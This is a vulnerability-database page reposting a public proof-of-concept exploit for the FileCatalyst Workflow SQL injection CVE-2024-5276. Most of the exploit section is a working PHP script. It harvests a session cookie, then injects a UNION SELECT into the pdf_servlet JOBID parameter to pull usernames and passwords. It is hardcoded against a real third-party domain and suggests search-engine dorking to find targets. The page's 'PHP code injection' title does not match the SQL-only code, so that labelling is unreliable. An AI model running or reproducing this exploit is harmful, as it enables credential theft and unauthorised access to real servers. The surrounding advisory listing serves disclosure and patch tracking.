Lucene search
K

๐Ÿ“„ Fortra FileCatalyst Workflow 5.1.6 Build 135 SQL Injection

๐Ÿ—“๏ธย 01 Dec 2025ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 125ย Views

Fortra FileCatalyst Workflow 5.1.6 Build 135 PHP and SQL injection via JSESSIONID (CVE-2024-5276).

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-5276
27 Jun 202408:58
โ€“circl
CNNVD
Fortra FileCatalyst Security Vulnerability
25 Jun 202400:00
โ€“cnnvd
CVE
CVE-2024-5276
25 Jun 202419:13
โ€“cve
Cvelist
CVE-2024-5276 SQL Injection Vulnerability in FileCatalyst Workflow 5.1.6 Build 135 (and earlier)
25 Jun 202419:13
โ€“cvelist
Tenable Nessus
Fortra FileCatalyst Workflow SQLi (CVE-2024-5276) (Version Check)
27 Jun 202400:00
โ€“nessus
Metasploit
Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)
19 Aug 202418:51
โ€“metasploit
Nuclei
Fortra FileCatalyst Workflow <= v5.1.6 - SQL Injection
3 Jun 202606:04
โ€“nuclei
NVD
CVE-2024-5276
25 Jun 202420:15
โ€“nvd
Packet Storm
Fortra FileCatalyst Workflow SQL Injection
31 Aug 202400:00
โ€“packetstorm
Packet Storm
Fortra FileCatalyst Workflow 5.1.6 Build 135 SQL Injection
14 Mar 202500:00
โ€“packetstorm
Rows per page
=============================================================================================================================================
    | # Title     : Fortra FileCatalyst Workflow v5.1.6 Build 135 PHP Code Injection Vulnerability                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.fortra.com/fr/lignes-de-produit/filecatalyst                                                                    |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description:  The code extracts the JSESSIONID first and then uses it to perform SQL Injection. 
    	
    	( https://packetstorm.news/files/id/180866/ CVE-2024-5276)
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 48 + 120
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class SessionExtractor {
        private $target;
        private $userAgent;
        private $jsessionid;
    
        public function __construct($target) {
            $this->target = rtrim($target, '/');
            $this->userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
        }
    
        private function sendRequest($url) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HEADER, true);
            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($ch, CURLOPT_USERAGENT, $this->userAgent);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
            
            $response = curl_exec($ch);
            
            if (curl_errno($ch)) {
                die("cURL Error: " . curl_error($ch));
            }
    
            curl_close($ch);
            return $response;
        }
    
        public function getSessionId() {
            echo "[*] Attempt to extract JSESSIONID...\n";
            $response = $this->sendRequest("{$this->target}/workflow/");
            
            if (preg_match('/Set-Cookie:\s*JSESSIONID=([^;]+)/i', $response, $matches)) {
                $this->jsessionid = trim($matches[1]);
                file_put_contents("session.txt", $this->jsessionid);
                echo "[+] Extracted JSESSIONID: {$this->jsessionid}\n";
                return $this->jsessionid;
            } else {
                die("[-] JSESSIONID not found. Check the link.\n");
            }
        }
    }
    
    $extractor = new SessionExtractor('https://esportstransfers.ea.com/');
    $jsessionid = $extractor->getSessionId();
    
    class Indoushka {
        private $target;
        private $userAgent;
        private $jsessionid = null;
    
        public function __construct($target) {
            $this->target = rtrim($target, '/');
            $this->userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
        }
    
        private function sendRequest($url, $headers = []) {
            $ch = curl_init();
            curl_setopt_array($ch, [
                CURLOPT_URL => $url,
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_HEADER => true,
                CURLOPT_FOLLOWLOCATION => true,  // ุชุชุจุน ุงู„ุชุญูˆูŠู„ุงุช
                CURLOPT_SSL_VERIFYHOST => false,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_USERAGENT => $this->userAgent,
                CURLOPT_HTTPHEADER => $headers
            ]);
    
            $response = curl_exec($ch);
            if (curl_errno($ch)) {
                die("CURL Error: " . curl_error($ch));
            }
            curl_close($ch);
    
            return $response;
        }
    
        public function getSessionId() {
            if ($this->jsessionid) {
                echo "[*] JSESSIONID already extracted: {$this->jsessionid}\n";
                return;
            }
    
            echo "[*] Attempting to extract JSESSIONID...\n";
            $response = $this->sendRequest("{$this->target}/workflow/");
    
            if (preg_match('/Set-Cookie:\s*JSESSIONID=([^;]+)/i', $response, $matches)) {
                $this->jsessionid = trim($matches[1]);
                echo "[+] JSESSIONID extracted: {$this->jsessionid}\n";
            } else {
                die("[-] JSESSIONID not found. Check the link.\n");
            }
        }
    
        public function injectSQL($payload) {
            if (!$this->jsessionid) {
                die("[-] No session ID found. Run getSessionId() first.\n");
            }
    
            echo "[*] Sending SQL Injection payload...\n";
            
            $url = "{$this->target}/workflow/pdf_servlet?JOBID=" . urlencode($payload);
            $headers = ["Cookie: JSESSIONID={$this->jsessionid}"];
            $response = $this->sendRequest($url, $headers);
    
                 if (strpos($response, "Success") !== false || strpos($response, "Admin") !== false) {
                echo "[+] SQL Injection executed successfully!\n";
            } else {
                echo "[-] SQL Injection failed. Check input validity.\n";
            }
        }
    }
    
    // ุชุดุบูŠู„ ุงู„ูƒูˆุฏ
    $injector = new Indoushka('https://esportstransfers.ea.com/');
    $injector->getSessionId();
    
    // ุญู…ูˆู„ุฉ ู…ุฎุตุตุฉ
    $payload = "' UNION SELECT username, password FROM users --";
    
    $injector->injectSQL($payload);
    ?>
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Dec 2025 00:00Current
8.2High risk
Vulners AI Score8.2
CVSS 3.19.1 - 9.8
EPSS0.87417
SSVC
125